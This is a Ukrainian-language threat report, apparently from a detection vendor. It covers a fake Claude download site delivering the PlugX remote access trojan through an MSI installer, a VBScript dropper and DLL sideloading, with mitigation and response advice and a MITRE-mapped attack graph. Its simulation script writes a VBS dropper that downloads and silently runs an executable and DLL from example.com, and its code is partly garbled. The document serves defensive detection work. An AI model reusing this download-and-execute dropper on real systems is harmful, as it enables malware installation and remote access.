Фейковий сайт Claude встановлює зловмисне ПЗ, яке надає атакуючим доступ до вашого комп’ютера

SOC Prime Team

Стежити

Фейковий сайт Claude встановлює зловмисне ПЗ, яке надає атакуючим доступ до вашого комп’ютера

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Нападники створили підроблену сторінку завантаження Claude, яка доставила троянську ZIP-архів для нічого не підозрюючих користувачів. При відкритті архів установлював на перший погляд легітимний десктопний клієнт Claude, приховано розгортаючи PlugX remote access trojan через підвантаження DLL з підписаним G DATA updater. Шкідливий код був розміщений у папці автозавантаження користувача для підтримки персистентності, а потім ініціював вихідний HTTPS зв’язок з командним і керуючим сервером. Кампанія демонструє, як актори загроз все частіше використовують інтерес до популярних AI-інструментів як соціальну інженерну приманку для початкового компрометації.

Розслідування

Під час аналізу дослідники розпакували ZIP-архів, ідентифікували шлях установки MSI та простежили виконання до VBScript dropper, який записував NOVUpdate.exe, шкідливу avk.dll, та зашифрований файл даних у папку автозавантаження. Виконання в пісочниці підтвердило успішний запуск підвантаженого бінарніка, зміну TCP/IP-пов’язаного ключа реєстру та ініціацію вихідних з’єднань через порт 443 до IP-адреси, розміщеної на Alibaba Cloud. Ці знахідки підтвердили доставку PlugX через поетапний ланцюг зараження, замаскований під легітимне AI програмне забезпечення.

Пом’якшення

Користувачам слід завантажувати програмне забезпечення Claude лише з перевірених офіційних джерел і перевіряти автентичність інсталяційних пакетів перед виконанням. Захисники повинні перевіряти папки автозавантаження на предмет неочікуваних бінарників або DLL, особливо файлів, які імітують легітимні компоненти оновлення. Також слід переглянути телеметрію брандмауера та кінцевих точок для перевірки підозрілих вихідних HTTPS трафіків, пов’язаних з нововстановленими додатками. Видалення шкідливих файлів, реверсування будь-яких несанкціонованих змін у реєстрі та запуск надійної антивірусної перевірки є ключовими кроками для стримування загрози.

Відповідь

Команди безпеки повинні виявляти та повідомляти про присутність NOVUpdate.exe, avk.dll, або NOVUpdate.exe.dat в директорії автозавантаження. Додаткові детектори повинні зосереджуватися на підписаних G DATA updater бінарниках, які завантажують ненадійні DLL та встановлюють неочікувані вихідні TLS-сесії з ідентифікованою інфраструктурою. Уражені хости повинні пройти повну ліквідацію та судово-експертизу, щоб підтвердити, що жодні інші компоненти PlugX, механізми персистентності або наступні корисні навантаження не залишаються активними.

graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[“Файл – Підроблений сайт Claude Розміщує шкідливий ZIP”]:::file node_malicious_zip[“Файл – Шкідливий ZIP Містить троянізований MSI-інсталятор”]:::file node_msi_installer[“Файл – Троянізований MSI-інсталятор”]:::file node_vbscript[“Скрипт – Claude AI.vbs Копіює файли, запускає Claude, забезпечує персистентність”]:::script node_novupdate_exe[“Файл – NOVUpdate.exe Легітимний оновлювач G DATA, використаний для DLL sideloading”]:::file node_avk_dll[“Файл – avk.dll Шкідлива DLL, що завантажується оновлювачем”]:::file node_dat_file[“Файл – NOVUpdate.exe.dat Зашифрований payload”]:::file node_startup_folder[“Файл – Папка Startup Місце призначення для скопійованих файлів”]:::file node_shortcut[“Файл – Claude AI.lnk Ярлик робочого столу, що запускає VBScript”]:::file node_cleanup_batch[“Файл – cleanup.bat Видаляє шкідливі артефакти після виконання”]:::file node_registry_key[“Реєстр – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters”]:::registry %% Nodes u2013 Techniques node_initial_access[“Техніка – T1204.002 Виконання користувачем Жертва завантажує ZIP і запускає MSI”]:::technique node_execution[“Техніка – T1059.005 Visual Basic Виконує шкідливий VBScript”]:::technique node_persistence_startup[“Техніка – T1037.005 Startup Items Копіює файли в папку Startup”]:::persistence node_persistence_shortcut[“Техніка – T1547.009 Модифікація ярлика Створює та замінює ярлик”]:::persistence node_appcert_dll[“Техніка – T1546.009 AppCert DLL DLL sideloading через оновлювач G DATA”]:::evasion node_obfuscation[“Техніка – T1027.009 Обфусковані файли .dat payload розшифровується під час виконання”]:::evasion node_registry_mod[“Техніка – T1012 Запит до реєстру Модифікує параметри TCP/IP”]:::registry node_c2_proxy[“Техніка – T1090.002 Проксі HTTPS через зовнішній проксі”]:::c2 node_c2_web[“Техніка – T1102 Веб-сервіс Комунікація через HTTPS”]:::c2 node_indicator_removal[“Техніка – T1070.010 Видалення індикаторів Batch-файл видаляє скрипт і себе”]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion

Потік атаки

Оповідання про атаку та команди:
Зловмисник створює шкідливий VBS скрипт, який завантажує корисне навантаження NOVUpdate.exe з командно-керуючого (C2) сервера, записує його в %TEMP%, а потім запускає його через wscript.exe. Той самий скрипт також завантажує avk.dll з того ж місця, щоб досягти підвантаження DLL. Зловмисник покладається на вбудований Windows Script Host (WSH), щоб уникнути підозри традиційних антивірусних евристик.
1. Записати шкідливий VBS файл (malicious.vbs) в %TEMP%.
2. Викликати wscript.exe з шляхом до VBS файла.
3. VBS скрипт виконує HTTP GET для отримання NOVUpdate.exe and avk.dll, записує їх на диск і виконує NOVUpdate.exe.

Скрипт регресійного тесту:

# --------------------------------------------------------------------
# Симуляція шкідливого dropper – тригери правил Sigma
# --------------------------------------------------------------------
$tempDir = "$env:TEMPDropperDemo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Створити шкідливий VBS, який завантажує два файли та запускає NOVUpdate.exe
$vbsPath = "$tempDirmalicious.vbs"
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.open "GET", "http://example.com/NOVUpdate.exe", False
objXML.send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
objStream.Close
End If

‘ Завантажити avk.dll (використовується для підвантаження DLL) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If

‘ Виконати скинути EXE CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Запустити скрипт через wscript.exe (це та телеметрія, яку ми тестуємо)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONAL: зупинити для дозволу на виконання
Start-Sleep -Seconds 10
# --------------------------------------------------------------------

Команди очищення:

# Видалити всі артефакти, створені симуляцією
$tempDir = "$env:TEMPDropperDemo"
if (Test-Path $tempDir) {
    Remove-Item -Path $tempDir -Recurse -Force
}

# Забезпечити завершення всіх залишків процесів NOVUpdate.exe
Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно